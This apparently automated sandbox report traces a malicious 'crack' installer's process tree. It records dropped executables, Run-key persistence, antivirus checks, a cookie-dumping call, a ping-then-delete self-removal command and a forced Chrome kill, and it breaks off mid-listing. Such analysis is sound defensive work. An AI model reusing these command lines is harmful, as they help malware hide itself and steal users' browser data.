IBInstaller_97039.tmp 5180 vpn.exe 5276 vpn.tmp 5472 winlthsth.exe 5540 win1host.exe 5620 1.exe 5920 Setup.exe 5124 hjjgaa.exe 4240 RunWW.exe 5352 jg7_7wjg.exe 3400 LabPicV3.exe 4704 lylal220.exe 3892 guihuali-game.exe 3984 LabPicV3.tmp 196 lylal220.tmp 2936 22.exe 6376 jfiag3g_gg.exe 6708 QJXVwuoxW.exe 6936 NoQIom6aF.exe 4764 jfiag3g_gg.exe 6340 setups.exe 6480 setups.tmp 4892 tapinstall.exe 6828 prolab.exe 5524 irecord.exe 6660 prolab.tmp 7124 irecord.tmp 4652 tapinstall.exe 6896 vict.exe 3744 Setup3310.exe 6000 vpn.exe 4600 vict.tmp 6400 cpyrix.exe 2364 Setup3310.tmp 5660 vpn.tmp 8104 win1host.exe 5468 md6_6ydj.exe 5332 Setup.exe 5600 1.exe 5444 askinstall31.exe 4648 md6_6ydj.exe 5712 cmd.exe 7184 askinstall31.exe 6324 MicrosoftEdge.exe 7364 mask_svc.exe 7936 dw20.exe 4380 dw20.exe 6632 client32.exe 7320 mask_svc.exe 5144 MicrosoftEdge.exe 6432 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Tekla_Structures_21_1_Russia_crack_by_aaocg.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exeSetup.exesetups.exeaskinstall20.execmd.exemultitimer.exemultitimer.exemultitimer.exedescription pid process target process PID 4688 wrote to memory of 3220 4688 Tekla_Structures_21_1_Russia_crack_by_aaocg.exe cmd.exe PID 4688 wrote to memory of 3220 4688 Tekla_Structures_21_1_Russia_crack_by_aaocg.exe cmd.exe PID 4688 wrote to memory of 3220 4688 Tekla_Structures_21_1_Russia_crack_by_aaocg.exe cmd.exe PID 3220 wrote to memory of 4076 3220 cmd.exe keygen-pr.exe PID 3220 wrote to memory of 4076 3220 cmd.exe keygen-pr.exe PID 3220 wrote to memory of 4076 3220 cmd.exe keygen-pr.exe PID 3220 wrote to memory of 3392 3220 cmd.exe keygen-step-1.exe PID 3220 wrote to memory of 3392 3220 cmd.exe keygen-step-1.exe PID 3220 wrote to memory of 3392 3220 cmd.exe keygen-step-1.exe PID 3220 wrote to memory of 4384 3220 cmd.exe keygen-step-3.exe PID 3220 wrote to memory of 4384 3220 cmd.exe keygen-step-3.exe PID 3220 wrote to memory of 4384 3220 cmd.exe keygen-step-3.exe PID 3220 wrote to memory of 4404 3220 cmd.exe keygen-step-4.exe PID 3220 wrote to memory of 4404 3220 cmd.exe keygen-step-4.exe PID 3220 wrote to memory of 4404 3220 cmd.exe keygen-step-4.exe PID 4076 wrote to memory of 1592 4076 keygen-pr.exe key.exe PID 4076 wrote to memory of 1592 4076 keygen-pr.exe key.exe PID 4076 wrote to memory of 1592 4076 keygen-pr.exe key.exe PID 4404 wrote to memory of 1896 4404 keygen-step-4.exe Setup.exe PID 4404 wrote to memory of 1896 4404 keygen-step-4.exe Setup.exe PID 4384 wrote to memory of 2256 4384 keygen-step-3.exe cmd.exe PID 4384 wrote to memory of 2256 4384 keygen-step-3.exe cmd.exe PID 4384 wrote to memory of 2256 4384 keygen-step-3.exe cmd.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 1592 wrote to memory of 2448 1592 key.exe key.exe PID 2256 wrote to memory of 4632 2256 cmd.exe PING.EXE PID 2256 wrote to memory of 4632 2256 cmd.exe PING.EXE PID 2256 wrote to memory of 4632 2256 cmd.exe PING.EXE PID 1896 wrote to memory of 224 1896 Setup.exe multitimer.exe PID 1896 wrote to memory of 224 1896 Setup.exe multitimer.exe PID 1896 wrote to memory of 4540 1896 Setup.exe setups.exe PID 1896 wrote to memory of 4540 1896 Setup.exe setups.exe PID 1896 wrote to memory of 4540 1896 Setup.exe setups.exe PID 4404 wrote to memory of 1388 4404 keygen-step-4.exe askinstall20.exe PID 4404 wrote to memory of 1388 4404 keygen-step-4.exe askinstall20.exe PID 4404 wrote to memory of 1388 4404 keygen-step-4.exe askinstall20.exe PID 4540 wrote to memory of 3096 4540 setups.exe setups.tmp PID 4540 wrote to memory of 3096 4540 setups.exe setups.tmp PID 4540 wrote to memory of 3096 4540 setups.exe setups.tmp PID 1388 wrote to memory of 3676 1388 askinstall20.exe cmd.exe PID 1388 wrote to memory of 3676 1388 askinstall20.exe cmd.exe PID 1388 wrote to memory of 3676 1388 askinstall20.exe cmd.exe PID 3676 wrote to memory of 4760 3676 cmd.exe taskkill.exe PID 3676 wrote to memory of 4760 3676 cmd.exe taskkill.exe PID 3676 wrote to memory of 4760 3676 cmd.exe taskkill.exe PID 224 wrote to memory of 884 224 multitimer.exe multitimer.exe PID 224 wrote to memory of 884 224 multitimer.exe multitimer.exe PID 884 wrote to memory of 1280 884 multitimer.exe multitimer.exe PID 884 wrote to memory of 1280 884 multitimer.exe multitimer.exe PID 1280 wrote to memory of 4196 1280 multitimer.exe KiffApp1.exe PID 1280 wrote to memory of 4196 1280 multitimer.exe KiffApp1.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2616
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2200
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1884
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1048
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in Windows directory
PID:364
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:392
-
C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_21_1_Russia_crack_by_aaocg.exe"C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_21_1_Russia_crack_by_aaocg.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3392
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\2DWOB7T3RC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2DWOB7T3RC\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Users\Admin\AppData\Local\Temp\2DWOB7T3RC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2DWOB7T3RC\multitimer.exe" 1 3.1617436098.60681dc2a5353 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Users\Admin\AppData\Local\Temp\2DWOB7T3RC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2DWOB7T3RC\multitimer.exe" 2 3.1617436098.60681dc2a53537⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\ewtjf5r33et\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\ewtjf5r33et\KiffApp1.exe"8⤵
- Executes dropped EXE
PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\x31yhg4sr5r\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\x31yhg4sr5r\cpyrix.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3668 -
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5620 -
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:4028
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:4088
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:6252
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3992 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:4104
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4gijvfwh54b\r1d0edpgrgd.exe"C:\Users\Admin\AppData\Local\Temp\4gijvfwh54b\r1d0edpgrgd.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:4880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "r1d0edpgrgd.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4gijvfwh54b\r1d0edpgrgd.exe" & exit9⤵PID:5148
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "r1d0edpgrgd.exe" /f10⤵
- Kills process with taskkill
PID:1972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\z2jl2osguny\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\z2jl2osguny\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\is-LE4J6.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LE4J6.tmp\Setup3310.tmp" /SL5="$201EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\z2jl2osguny\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\is-GBSA8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GBSA8.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5920 -
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5124 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6376
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4764
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 94812⤵
- Drops file in Windows directory
- Program crash
PID:5896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 100812⤵
- Program crash
PID:4620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 101612⤵
- Program crash
PID:7172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 114812⤵
- Program crash
PID:7500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 116412⤵
- Program crash
PID:3948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 122412⤵
- Program crash
PID:7804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 127612⤵
- Program crash
PID:3816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 126812⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7736
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5352
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\is-6EOR2.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6EOR2.tmp\LabPicV3.tmp" /SL5="$20310,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\is-NRQ7R.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-NRQ7R.tmp\ppppppfy.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:640 -
C:\Program Files\Mozilla Firefox\KKJMEKPBDP\prolab.exe"C:\Program Files\Mozilla Firefox\KKJMEKPBDP\prolab.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
PID:6828 -
C:\Users\Admin\AppData\Local\Temp\is-0AFTE.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-0AFTE.tmp\prolab.tmp" /SL5="$303CC,575243,216576,C:\Program Files\Mozilla Firefox\KKJMEKPBDP\prolab.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6660
-
-
-
C:\Users\Admin\AppData\Local\Temp\7d-b75e1-5f3-3e7ad-8c9004d100c90\Pyshaepudaeho.exe"C:\Users\Admin\AppData\Local\Temp\7d-b75e1-5f3-3e7ad-8c9004d100c90\Pyshaepudaeho.exe"14⤵PID:6976
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 238015⤵
- Suspicious use of SetWindowsHookEx
PID:7936
-
-
-
C:\Users\Admin\AppData\Local\Temp\ce-52126-d71-6d7b3-ab6e3fdba4fa2\Moxohyfany.exe"C:\Users\Admin\AppData\Local\Temp\ce-52126-d71-6d7b3-ab6e3fdba4fa2\Moxohyfany.exe"14⤵PID:2332
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\leh0bc0v.cv5\md6_6ydj.exe & exit15⤵PID:7292
-
C:\Users\Admin\AppData\Local\Temp\leh0bc0v.cv5\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\leh0bc0v.cv5\md6_6ydj.exe16⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:4648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zztaqo2a.r3i\askinstall31.exe & exit15⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\zztaqo2a.r3i\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\zztaqo2a.r3i\askinstall31.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:7184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gbrwopfs.q2e\toolspab1.exe & exit15⤵PID:8056
-
C:\Users\Admin\AppData\Local\Temp\gbrwopfs.q2e\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\gbrwopfs.q2e\toolspab1.exe16⤵
- Suspicious use of SetThreadContext
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\gbrwopfs.q2e\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\gbrwopfs.q2e\toolspab1.exe17⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:5816
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4704 -
C:\Users\Admin\AppData\Local\Temp\is-BU4KG.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-BU4KG.tmp\lylal220.tmp" /SL5="$40130,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:196 -
C:\Users\Admin\AppData\Local\Temp\is-SM9H0.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-SM9H0.tmp\Microsoft.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5888 -
C:\Users\Admin\AppData\Local\Temp\WZTHYXPXRI\irecord.exe"C:\Users\Admin\AppData\Local\Temp\WZTHYXPXRI\irecord.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
PID:5524 -
C:\Users\Admin\AppData\Local\Temp\is-ORVRO.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-ORVRO.tmp\irecord.tmp" /SL5="$6042C,6265333,408064,C:\Users\Admin\AppData\Local\Temp\WZTHYXPXRI\irecord.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:7124
-
-
-
C:\Users\Admin\AppData\Local\Temp\d4-e532d-146-ca381-554336a83e208\Luqaeshulupy.exe"C:\Users\Admin\AppData\Local\Temp\d4-e532d-146-ca381-554336a83e208\Luqaeshulupy.exe"14⤵PID:5588
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\efqvjsyw.ka4\md6_6ydj.exe & exit15⤵PID:7888
-
C:\Users\Admin\AppData\Local\Temp\efqvjsyw.ka4\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\efqvjsyw.ka4\md6_6ydj.exe16⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:5468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\deibaj4c.gz2\askinstall31.exe & exit15⤵PID:4200
-
C:\Users\Admin\AppData\Local\Temp\deibaj4c.gz2\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\deibaj4c.gz2\askinstall31.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:5444 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:1460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:8096
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rw2dzr3q.joy\toolspab1.exe & exit15⤵
- Suspicious use of SetWindowsHookEx
PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\ef-d0978-541-e7a86-e83e76f17dc06\Conytikaela.exe"C:\Users\Admin\AppData\Local\Temp\ef-d0978-541-e7a86-e83e76f17dc06\Conytikaela.exe"14⤵PID:5972
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 221215⤵
- Suspicious use of SetWindowsHookEx
PID:4380
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2936 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:6808
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5804
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3892 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6640
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3592
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵
- Executes dropped EXE
PID:5892
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵
- Executes dropped EXE
PID:5776 -
C:\Users\Admin\AppData\Local\Temp\JOTHPPP6O1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JOTHPPP6O1\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:6300 -
C:\Users\Admin\AppData\Local\Temp\JOTHPPP6O1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JOTHPPP6O1\multitimer.exe" 1 3.1617436183.60681e179c978 10313⤵
- Adds Run key to start application
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\JOTHPPP6O1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JOTHPPP6O1\multitimer.exe" 2 3.1617436183.60681e179c97814⤵
- Checks for any installed AV software in registry
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\bfb5cydbuov\vict.exe"C:\Users\Admin\AppData\Local\Temp\bfb5cydbuov\vict.exe" /VERYSILENT /id=53515⤵
- Suspicious use of SetWindowsHookEx
PID:6896 -
C:\Users\Admin\AppData\Local\Temp\is-KM038.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KM038.tmp\vict.tmp" /SL5="$30370,870426,780800,C:\Users\Admin\AppData\Local\Temp\bfb5cydbuov\vict.exe" /VERYSILENT /id=53516⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4600 -
C:\Users\Admin\AppData\Local\Temp\is-1ID4H.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-1ID4H.tmp\win1host.exe" 53517⤵
- Suspicious use of SetWindowsHookEx
PID:8104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ymacstnxssm\2jmwf4ituvu.exe"C:\Users\Admin\AppData\Local\Temp\ymacstnxssm\2jmwf4ituvu.exe" /ustwo INSTALL15⤵PID:5800
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2jmwf4ituvu.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ymacstnxssm\2jmwf4ituvu.exe" & exit16⤵PID:7944
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2jmwf4ituvu.exe" /f17⤵
- Kills process with taskkill
PID:6040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0zrjiajybdl\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\0zrjiajybdl\Setup3310.exe" /Verysilent /subid=57715⤵
- Suspicious use of SetWindowsHookEx
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\is-T5KK5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-T5KK5.tmp\Setup3310.tmp" /SL5="$202C6,138429,56832,C:\Users\Admin\AppData\Local\Temp\0zrjiajybdl\Setup3310.exe" /Verysilent /subid=57716⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2364 -
C:\Users\Admin\AppData\Local\Temp\is-69G6P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-69G6P.tmp\Setup.exe" /Verysilent17⤵
- Suspicious use of SetWindowsHookEx
PID:5332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cfuioi4ftk2\app.exe"C:\Users\Admin\AppData\Local\Temp\cfuioi4ftk2\app.exe" /8-2315⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\cfuioi4ftk2\app.exe"C:\Users\Admin\AppData\Local\Temp\cfuioi4ftk2\app.exe" /8-2316⤵PID:7004
-
-
-
C:\Users\Admin\AppData\Local\Temp\teeiyycvtly\vpn.exe"C:\Users\Admin\AppData\Local\Temp\teeiyycvtly\vpn.exe" /silent /subid=48215⤵
- Suspicious use of SetWindowsHookEx
PID:6000 -
